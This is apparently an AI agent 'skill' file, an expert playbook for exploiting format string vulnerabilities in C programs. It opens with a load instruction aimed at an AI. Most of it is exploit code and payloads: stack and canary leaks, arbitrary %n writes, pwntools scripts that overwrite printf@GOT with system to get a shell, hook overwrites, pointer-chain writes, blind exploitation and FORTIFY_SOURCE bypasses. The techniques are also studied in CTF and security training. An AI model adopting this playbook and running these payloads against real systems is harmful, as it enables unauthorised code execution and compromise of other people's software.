SKILL: Format String Exploitation — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget that on 64-bit the target addresses must go after the format specifiers.

0. RELATED ROUTING

stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
arbitrary-write-to-rce — convert format string write primitive to code execution targets
heap-exploitation — heap address leak via format string for heap exploitation

1. VULNERABILITY IDENTIFICATION

Vulnerable Pattern

```c
printf(user_input);             // VULNERABLE: user controls format string
fprintf(fp, user_input);        // VULNERABLE
sprintf(buf, user_input);       // VULNERABLE
snprintf(buf, sz, user_input);  // VULNERABLE

printf("%s", user_input);       // SAFE: format string is fixed
```

Quick Test

Input: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p
If the output shows stack values (hex addresses or (nil)): format string confirmed
Look for 0x4141414141414141 (64-bit) or 0x41414141 (32-bit) in the output: its position is your input offset

2. READING MEMORY

Stack Leak (%p)

Format	Action	Use
`%p`	Print next stack value as pointer	Sequential stack dump
`%N$p`	Print N-th parameter as pointer	Direct positional access
`%N$lx`	Like `%N$p`, but plain hex with no `0x` prefix and no `(nil)` (width of `long`: 8 bytes on 64-bit)	Predictable output for parsing
`%N$s`	Dereference N-th parameter as string pointer	Read memory at pointer value

Finding Your Input Offset

```python
# Send:   AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0xa.0x4141414141414141...
#         ↑ the marker is the 6th value → offset = 6 (example)

# Or automated (io is a pwntools tube; the target must keep reading input in a loop,
# otherwise start a fresh process for each attempt):
for i in range(1, 30):
    io.sendline(f'AAAAAAAA%{i}$p'.encode())
    if b'41414141' in io.recvline():   # matches both 0x41414141 and 0x4141414141414141
        print(f'Offset = {i}')
        break
```
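The automated loop needs one request per guess. If the target prints a single long `%p` dump instead, the offset can be read off that dump offline. The sketch below assumes the dotted probe format shown above. `find_input_offset` is a hypothetical helper, not a pwntools function:

```python
from typing import Optional


def find_input_offset(leak: str, marker: str = "41414141") -> Optional[int]:
    """Return the %N$p position whose printed value contains `marker`.

    `leak` is the program's output for a probe such as 'AAAAAAAA.%p.%p.%p...'.
    Field 0 is the echoed 'AAAAAAAA' text. Field i (i >= 1) is what the i-th %p
    printed, which is the same value that %i$p prints.
    """
    fields = leak.strip().split(".")
    for position, value in enumerate(fields[1:], start=1):
        if value != "(nil)" and marker in value.lower():
            return position
    return None


# Illustrative output of the probe above; the 7th value is the '.%p.%p.%' text itself
sample = "AAAAAAAA.0x7ffd12340000.(nil).(nil).0x7f1234567890.0xa.0x4141414141414141.0x252e70252e70252e"
print(find_input_offset(sample))   # 6
```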

Leaking Specific Values

Target	Method	Stack Position
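Canary	`%N$p` where N = canary slot offset	Typically input offset + buf_size/8 (64-bit) when the format buffer sits directly below the canary; glibc canaries have a 0x00 low byte
Saved RBP	`%N$p` (the slot right before the return address)	Leaks a stack address → compute the addresses of buffers and of the return-address slot
Return address	`%N$p`	Leaks a .text address → PIE base = leak - (offset of the return site in the binary); the result must be page-aligned
Libc address	`%N$p` where N points to the `__libc_start_main+XX` return address on the stack (`__libc_start_call_main+XX` on glibc ≥ 2.34)	libc base = leak - offset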
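The base calculations in the table are plain subtraction plus a sanity check. The sketch below is a minimal version. The offsets must come from your own copy of the binary or libc, and the numbers here are made up for illustration. `looks_like_canary` is a hypothetical heuristic based on glibc canaries having a zero low byte:

```python
def base_from_leak(leak: int, known_offset: int) -> int:
    """Module base = leaked pointer - that pointer's offset inside the module.

    Module bases are page-aligned, so non-zero low 12 bits mean the offset
    (or the guessed libc version) is wrong.
    """
    base = leak - known_offset
    if base & 0xFFF:
        raise ValueError(f"base {base:#x} is not page-aligned; check the offset")
    return base


def looks_like_canary(value: int) -> bool:
    """Heuristic only: a 0x00 low byte and a value above the 48-bit user-space range."""
    return (value & 0xFF) == 0 and value > 0xFFFFFFFFFFFF


# Hypothetical leaks and offsets, for illustration only
pie_base = base_from_leak(0x55D0C4A0129F, 0x129F)
libc_base = base_from_leak(0x7F3A1C829D90, 0x29D90)
print(hex(pie_base), hex(libc_base))   # 0x55d0c4a00000 0x7f3a1c800000
```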

Reading Arbitrary Address (%s)

```python
# 32-bit: place the address at the start of the format string
payload = p32(target_addr) + f'%{offset}$s'.encode()   # offset = slot where target_addr lands (the input offset)

# 64-bit: the address contains null bytes → place it AFTER the format specifiers
payload = b'%7$sAAAA' + p64(target_addr)   # input offset 6: '%7$sAAAA' fills slot 6, the address lands in slot 7
```
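A fixed specifier such as `%7$sAAAA` only works for one particular input offset. The sketch below covers the general 64-bit layout. It assumes the input starts exactly at a slot boundary. The specifier is padded to a multiple of 8 bytes, and its slot number is recomputed until it fits. `read_payload_64` is a hypothetical name, and `struct` stands in for pwntools' `p64`:

```python
import struct


def read_payload_64(target_addr: int, input_offset: int) -> bytes:
    """'%K$s' + padding + p64(target_addr), where K is the slot holding the address."""
    reserved = 8  # bytes set aside for the specifier, always a multiple of 8
    while True:
        slot = input_offset + reserved // 8  # the address lands right after the reserved bytes
        spec = f"%{slot}$s".encode()
        if len(spec) <= reserved:
            break
        reserved += 8
    return spec.ljust(reserved, b"A") + struct.pack("<Q", target_addr)


payload = read_payload_64(0x404018, 6)
print(payload)   # b'%7$sAAAA\x18@@\x00\x00\x00\x00\x00'
```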

---

3. WRITING MEMORY (%n)

Write Specifiers

Specifier	Bytes Written	Value Written
`%n`	4 bytes (int)	Characters printed so far
`%hn`	2 bytes (short)	Characters printed so far (mod 0x10000)
`%hhn`	1 byte (char)	Characters printed so far (mod 0x100)
`%ln`	8 bytes (long, on 64-bit)	Characters printed so far
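Every write in this section reduces to one calculation. You need the number of characters to print so that the running count equals the wanted value, taken modulo 2^16 for `%hn` or 2^8 for `%hhn`. The sketch below does this with a hypothetical helper, `pad_spec`. It returns an empty string for a zero delta, because `%0c` still prints one character:

```python
def pad_spec(target: int, printed: int, bits: int) -> str:
    """'%Nc' that moves the printed count from `printed` to `target` (mod 2**bits)."""
    delta = (target - printed) % (1 << bits)
    return f"%{delta}c" if delta else ""


# 8 bytes already printed (two 32-bit addresses), want 0x1234 via %hn
print(pad_spec(0x1234, 8, 16))   # %4652c
# Wrap-around: want 0x05 via %hhn after 8 characters
print(pad_spec(0x05, 8, 8))      # %253c
```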

Arbitrary Write Technique

Goal: write `value` to address `target_addr`.

32-bit (address on stack directly):

```python
# Write 2 bytes at a time using %hn
# Place the target addresses at the start of the format string (they land on the stack)
payload  = p32(target_addr)        # slot `offset`: low 2 bytes
payload += p32(target_addr + 2)    # slot `offset + 1`: high 2 bytes

# Padding for each %hn: the 8 address bytes have already been printed
low  = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{low - 8}c%{offset}$hn'.encode()                  # assumes low > 8
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()  # assumes high != low (%0c still prints 1 char)
```
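The snippet above only works when `low > 8` and `high != low`; otherwise the `%Nc` widths come out wrong. The sketch below removes both limits. It writes the smaller half first and lets the count wrap modulo 0x10000. `emulate_hn` replays only `%Nc` and `%K$hn`, so the result can be checked without a target. Both names are hypothetical, and `struct` stands in for `p32`:

```python
import re
import struct


def hn_payload_32(target_addr: int, value: int, offset: int) -> bytes:
    """32-bit: two %hn writes, with both addresses at the start of the buffer.

    Slot `offset` holds target_addr (low half) and slot offset+1 holds
    target_addr+2 (high half). The smaller half is written first.
    """
    payload = struct.pack("<I", target_addr) + struct.pack("<I", target_addr + 2)
    halves = [(offset, value & 0xFFFF), (offset + 1, (value >> 16) & 0xFFFF)]
    printed = len(payload)  # the 8 address bytes are printed before any specifier
    for slot, half in sorted(halves, key=lambda h: h[1]):
        delta = (half - printed) % 0x10000
        if delta:  # '%0c' would still print one character
            payload += f"%{delta}c".encode()
        payload += f"%{slot}$hn".encode()
        printed += delta
    return payload


def emulate_hn(payload: bytes, skip: int) -> dict:
    """Replay '%Nc' / '%K$hn' after `skip` literal bytes and return {slot: stored value}."""
    printed, stored = skip, {}
    for width, slot in re.findall(rb"%(\d+)c|%(\d+)\$hn", payload[skip:]):
        if width:
            printed += int(width)
        else:
            stored[int(slot)] = printed % 0x10000
    return stored


p = hn_payload_32(0x0804A010, 0xF7E3C8B0, 7)
print(emulate_hn(p, 8))   # {7: 51376, 8: 63459}
```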


64-bit (address AFTER format string):

```python
# Addresses contain null bytes (0x00007fXXXXXXXXXX) that terminate the format string,
# so place the addresses AFTER the format specifiers

# Step 1: format string portion (no null bytes)
fmt = b'%Xc%N$hn%Yc%M$hn'        # N, M = slots where the addresses will land
# Step 2: pad to 8-byte alignment
fmt = fmt.ljust(align, b'A')     # align = multiple of 8 >= len(fmt); N = input offset + align // 8
# Step 3: append target addresses
fmt += p64(target_addr)          # slot N
fmt += p64(target_addr + 2)      # slot M = N + 1
# Two %hn writes cover the low 4 bytes; add a third at target_addr + 4 for a full 48-bit pointer
```
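Steps 1 to 3 are circular. The slot numbers N and M depend on how long the padded specifier part is, and that length depends on how many digits N and M have. The sketch below resolves this by growing the reserved length 8 bytes at a time until the specifiers fit. It assumes nothing is printed before the payload. `hn_payload_64` and `emulate_writes` are hypothetical names:

```python
import re
import struct


def hn_payload_64(target_addr: int, value: int, offset: int, nwrites: int = 3) -> bytes:
    """Specifiers first, padded to a multiple of 8, then one p64 address per %hn."""
    writes = [(target_addr + 2 * i, (value >> (16 * i)) & 0xFFFF) for i in range(nwrites)]
    writes.sort(key=lambda w: w[1])  # smallest value first keeps the output short
    reserved = 8
    while True:
        first_slot = offset + reserved // 8  # slot of the first appended address
        fmt, printed = b"", 0
        for i, (_, half) in enumerate(writes):
            delta = (half - printed) % 0x10000
            if delta:
                fmt += f"%{delta}c".encode()
            fmt += f"%{first_slot + i}$hn".encode()
            printed += delta
        if len(fmt) <= reserved:
            break
        reserved += 8
    addrs = b"".join(struct.pack("<Q", addr) for addr, _ in writes)
    return fmt.ljust(reserved, b"A") + addrs


def emulate_writes(payload: bytes, offset: int, nwrites: int = 3) -> dict:
    """Replay the specifier part, mapping each %K$hn to the address stored in slot K."""
    head = payload[: len(payload) - 8 * nwrites]
    printed, stored = 0, {}
    for width, slot in re.findall(rb"%(\d+)c|%(\d+)\$hn", head):
        if width:
            printed += int(width)
        else:
            pos = (int(slot) - offset) * 8
            addr = struct.unpack("<Q", payload[pos:pos + 8])[0]
            stored[addr] = printed % 0x10000
    return stored


p = hn_payload_64(0x404018, 0x7F1234567890, 6)
print(len(p), {hex(a): hex(v) for a, v in emulate_writes(p, 6).items()})
# 64 {'0x40401a': '0x3456', '0x404018': '0x7890', '0x40401c': '0x7f12'}
```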

Byte-by-Byte Write with %hhn

Write one byte at a time (6 writes for a full 48-bit address on 64-bit). Each `%hhn` only needs the count to advance by at most 255 characters, which keeps the output short:

```python
writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = bytes([byte_val])   # one byte per entry; an int would be packed to a full word and overlap

# pwntools handles the math (set context.arch = 'amd64' first):
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
```
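Sorting the six byte writes by value means the count only moves forward between writes. Starting from a count of zero, the whole sequence then prints at most 255 characters. The sketch below shows that ordering and assumes nothing has been printed yet. `hhn_plan` and `replay` are hypothetical helpers that plan and check the writes; they are not pwntools functions:

```python
def hhn_plan(target_addr: int, value: int, nbytes: int = 6, printed: int = 0):
    """Plan byte-wise %hhn writes and return ([(address, pad_width)], final count).

    A pad_width of 0 means: emit no %c before that %hhn ('%0c' prints 1 char).
    """
    writes = sorted(
        ((target_addr + i, (value >> (8 * i)) & 0xFF) for i in range(nbytes)),
        key=lambda w: w[1],
    )
    plan = []
    for addr, byte in writes:
        delta = (byte - printed) % 0x100
        plan.append((addr, delta))
        printed += delta
    return plan, printed


def replay(plan, start: int = 0) -> dict:
    """Recompute the byte each %hhn would store, to double-check a plan."""
    printed, memory = start, {}
    for addr, delta in plan:
        printed += delta
        memory[addr] = printed % 0x100
    return memory


plan, total = hhn_plan(0x601020, 0x7F1234567890)
print(total)   # 144: the whole sequence prints 0x90 characters
```

Each `(address, pad_width)` pair then becomes `%{pad_width}c%{slot}$hhn` (or just `%{slot}$hhn` when the width is 0). The slots are laid out as in the 64-bit template.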

---

4. PWNTOOLS fmtstr_payload()

```python
from pwn import *

# context.arch ('amd64' or 'i386') must match the target
# Overwrite a GOT entry with a target address (libc.address must already be set to the leaked base)
payload = fmtstr_payload(
    offset,                                        # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},   # {addr: value}
    numbwritten=0,                                 # bytes already output before our input
    write_size='short'                             # 'byte', 'short', or 'int'
)

# For 64-bit, fmtstr_payload places the addresses after the format string automatically
```

FmtStr Class (Interactive Exploitation)

```python
from pwn import *

def send_payload(payload):
    # Called repeatedly while FmtStr probes for the offset, so the target must
    # loop on input (or this function must start a fresh process per call)
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)   # fmt.offset is auto-detected

fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
```

---

5. GOT OVERWRITE VIA FORMAT STRING

Common Targets

Overwrite	With	Trigger
`printf@GOT`	`system`	Next `printf(user_input)` → `system(user_input)` , send `/bin/sh`
`strlen@GOT`	`system`	If `strlen(user_input)` called
`puts@GOT`	`system`	If `puts(user_input)` called
`atoi@GOT`	`system`	If `atoi(user_input)` called (send `sh` as "number")
`__stack_chk_fail@GOT`	Address of a `ret` gadget (or other harmless code)	A smashed canary no longer aborts, so a stack overflow can reach its return address
`exit@GOT`	`main`	Create infinite loop for multi-shot exploit
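Once printf@GOT has been resolved (the function has been called at least once), its current value and `system` both point into the same libc mapping. They therefore usually share their upper bytes, and only the differing low bytes need a `%hhn` each. The sketch below makes that comparison. `changed_bytes` is a hypothetical helper, and the addresses are illustrative:

```python
def changed_bytes(old: int, new: int, width: int = 8) -> dict:
    """Return {byte_index: new_byte} for every byte where `new` differs from `old`."""
    result = {}
    for i in range(width):
        old_byte = (old >> (8 * i)) & 0xFF
        new_byte = (new >> (8 * i)) & 0xFF
        if old_byte != new_byte:
            result[i] = new_byte
    return result


# Illustrative resolved printf@GOT value and system address in the same libc
print(changed_bytes(0x7F12345606F0, 0x7F1234550D70))   # {0: 112, 1: 13, 2: 85}
```

Write all the differing bytes in the same printf call. A half-updated printf@GOT would crash the next call to printf.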

Hook Targets (glibc < 2.34)

Target	With	Trigger
`__malloc_hook`	one_gadget addr	A `printf` with a very large field width (e.g. `%100000c`) allocates its work buffer with `malloc`
`__free_hook`	`system`	Trigger `free()` on a chunk that holds `"/bin/sh"`

6. STACK POINTER CHAIN EXPLOITATION

When the format string is not on the stack (e.g., it is stored in a heap or .bss buffer), you cannot place target addresses on the stack yourself. Instead, use pointer chains that already exist on the stack to achieve an arbitrary write.

Two-Stage Write

```
Stack:
  [offset A] → ptr_X (stack address pointing to the slot at offset B)
  [offset B] → ptr_Y (the value ptr_X points to; itself a pointer)

Stage 1: %A$hn writes through ptr_X → overwrites ptr_Y's low 2 bytes → slot B now holds target_addr
Stage 2: %B$hn writes through the modified ptr_Y → writes to target_addr
```

Run the two stages in separate printf calls. Once a format string uses positional arguments, glibc fetches all of them up front, so a %B$hn in the same call would still write through the old ptr_Y.

This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

Finding Pointer Chains

Leak the stack with %p and look for:

1. A stack value at offset N that points to another stack slot (the slot at offset M)
2. The slot at offset M, which itself holds a pointer (e.g., the next saved rbp)

Write through offset N (using %N$hn) to change the low bytes of the pointer stored at offset M.

Then, in a later printf call, write through offset M (using %M$hn) to reach the target.
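Turning a leaked stack pointer into a slot number is simple arithmetic once you know the address of one slot with a known index. That anchor might come, for example, from a leaked stack pointer plus a fixed distance observed in a debugger. The sketch below works under that assumption. `slot_of` and `chain_payloads` are hypothetical helpers, and all numbers are illustrative. The single `%hn` in stage 1 only works when the target shares its upper 6 bytes with the pointer it replaces, for instance another stack slot such as a return address:

```python
def slot_of(stack_addr: int, known_slot: int, known_slot_addr: int) -> int:
    """Positional index of the 8-byte stack slot at `stack_addr`."""
    diff = stack_addr - known_slot_addr
    if diff % 8:
        raise ValueError("not 8-byte aligned relative to the known slot")
    return known_slot + diff // 8


def pad(count: int) -> str:
    # '%0c' still prints one character, so print nothing for a zero count
    return f"%{count}c" if count else ""


def chain_payloads(n, ptr_at_n, ptr_at_m, target_addr, value16, known_slot, known_slot_addr):
    """Return (M, stage1, stage2). Send stage1 and stage2 in separate printf calls."""
    m = slot_of(ptr_at_n, known_slot, known_slot_addr)  # slot N points at slot M
    if ptr_at_m >> 16 != target_addr >> 16:
        raise ValueError("one %hn can only retarget within the same 64 KiB window")
    stage1 = pad(target_addr & 0xFFFF) + f"%{n}$hn"  # rewrite the low 2 bytes of the pointer in slot M
    stage2 = pad(value16) + f"%{m}$hn"               # write value16 through that pointer
    return m, stage1.encode(), stage2.encode()


# Hypothetical leaks: slot 6 is at 0x7ffc0000d000; slot 15 points to slot 37, which
# holds the next saved rbp; the target is a return-address slot on the same stack
print(chain_payloads(15, 0x7FFC0000D0F8, 0x7FFC0000D1A0, 0x7FFC0000D048, 0x1234, 6, 0x7FFC0000D000))
# (37, b'%53320c%15$hn', b'%4660c%37$hn')
```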

---

7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.

Methodology

Step	Action	Purpose
1	Send `%p` × 50	Dump stack, identify address patterns
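2	Identify offsets	Classify values: libc addrs (usually 0x7f..., below the stack), stack addrs (usually 0x7ffc... to 0x7fff...), code addrs (0x55.../0x56... with PIE, 0x40... without)
3	Find input offset	Send `AAAAAAAA%N$p` for N=1..50, find 41414141
4	Identify binary base	Code addresses reveal PIE base (or fixed base if no PIE)
5	Leak GOT entries	With the binary base known, read GOT entries via `%N$s` with a GOT address placed in the payload (without the binary, first dump it with repeated `%s` reads to locate the GOT)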
6	Calculate libc base	GOT value - libc symbol offset
7	Overwrite GOT	`%n` to rewrite GOT entry with system address
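Step 2 is mostly pattern matching on the leaked values. The rough sketch below is for x86-64 Linux and assumes typical default memory layouts. The ranges are heuristics, not guarantees, and `classify` is a hypothetical helper:

```python
def classify(value: int) -> str:
    """Rough guess at what a leaked x86-64 Linux %p value points to (heuristic ranges)."""
    if value == 0:
        return "null"
    if 0x7FFC00000000 <= value <= 0x7FFFFFFFFFFF:
        return "stack"
    if 0x7F0000000000 <= value < 0x7FFC00000000:
        return "libc/mmap"
    if 0x550000000000 <= value < 0x570000000000:
        return "pie image/heap"
    if 0x400000 <= value < 0x1000000:
        return "non-pie image"
    return "other"


leak = "0x7ffd12340000.(nil).0x7f1234567890.0x55d0c4a0129f.0x401156"
for field in leak.split("."):
    value = 0 if field == "(nil)" else int(field, 16)
    print(field, classify(value))
```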

8. FORTIFY_SOURCE BYPASS

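FORTIFY_SOURCE (gcc `-D_FORTIFY_SOURCE=2`) replaces `printf` with `__printf_chk`, which adds two runtime checks:

- A format string containing `%n` aborts ("%n in writable segment detected") if the format string lives in writable memory, as user input always does.
- Positional `%N$` arguments abort ("invalid %N$ use detected") unless every argument from 1 to N is referenced.

Sequential leaks such as `%p%p%p` still work.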
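`__printf_chk` rejects `%n` in a writable format string and rejects positional `%N$` arguments that skip an index. These rules can be approximated offline to check a payload before sending it. The rough sketch below assumes the format string is writable (as user input is) and that only the conversions in the regex appear. It is a simplification of glibc's behavior, and `fortify_problems` is a hypothetical name:

```python
import re

# %[N$][flags][width][.precision][length]conversion  (simplified)
SPEC = re.compile(r"%(?:(\d+)\$)?[-+ #0]*\d*(?:\.\d+)?(hh|h|ll|l)?([diouxXcspn%])")


def fortify_problems(fmt: str) -> list:
    """Return the __printf_chk checks that a writable `fmt` would likely trip."""
    problems = set()
    positions = set()
    for pos, _length, conv in SPEC.findall(fmt):
        if conv == "n":
            problems.add("%n in writable format")
        if pos:
            positions.add(int(pos))
    if positions and positions != set(range(1, max(positions) + 1)):
        problems.add("positional gap")
    return sorted(problems)


print(fortify_problems("%7$p"))                   # ['positional gap']
print(fortify_problems("%p.%p.%p.%p.%p.%p.%p"))   # []
print(fortify_problems("%123c%7$hn"))             # ['%n in writable format', 'positional gap']
```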

Bypass Techniques

Method	Detail
Use sequential specifiers (no positional)	Avoids the `%N$` gap check, so `%p%p%p...` leaks still work; any `%n` in a writable format string still aborts
Stack-based exploit	Use those leaks to defeat canary/PIE/ASLR, then overwrite the return address through a separate stack overflow
Heap overflow instead	FORTIFY doesn't protect heap — combine with heap bug
Return-to-printf	ROP to call unfortified `printf` (if available in binary or libc)

9. 64-BIT CONSIDERATIONS

Challenge	Solution
Addresses contain `\x00` (null byte terminates format string)	Place addresses AFTER format specifiers, pad to alignment
Address width: 6 significant bytes	Write 3 × `%hn` (2 bytes each) or 6 × `%hhn`
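Larger stack offset range	For `printf`, input usually starts at offset 6 or higher: `%1$` through `%5$` read rsi, rdx, rcx, r8, r9 (rdi holds the format string), so `%6$` is the first stack slot; `fprintf`/`sprintf` shift this down by one
48-bit address space	User-space addresses fit in the low 48 bits, so the top 2 bytes are 0x0000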

Layout Template (64-bit)

```
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →
```

10. DECISION TREE

```
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → %n aborts (writable format string); %N$ must not skip arguments
│   │   ├── Leak with sequential %p%p%p... (canary, PIE, libc)
│   │   └── Get the write from another primitive (stack overflow, heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack (__libc_start_call_main on glibc ≥ 2.34)
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (after leaking a stack address)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes
```
